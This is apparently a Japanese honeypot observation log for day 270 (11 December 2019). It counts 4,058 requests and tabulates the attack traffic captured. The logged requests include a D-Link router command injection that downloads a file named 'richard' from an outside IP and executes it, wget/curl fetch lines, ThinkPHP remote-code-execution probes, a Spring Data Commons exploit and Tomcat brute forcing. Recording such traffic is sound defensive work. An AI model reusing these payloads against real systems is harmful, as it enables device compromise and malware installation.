WOWHoneypot観察(270日目)
2019/12/11(水)
トータルは4058件でした。
ハンティングログは以下です。
208.113.204[.]109 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.113.204[.]109 curl -O hxxp[:]//145.249.106[.]241/richard |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
4003 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
42 | アクセス | GET / |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | 不正中継の調査 | HEAD hxxp[:]//112.124.42.80:63435/ |
1 | 不明 | HEAD /esps/ |
1 | D-Linkルータの脆弱性を狙った通信 | GET /goform/formSysCmd?sysCmd=wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard;&apply=Apply&submit-url=/syscmd.asp&msg=%20 |
1 | 管理者設定の調査 | GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin |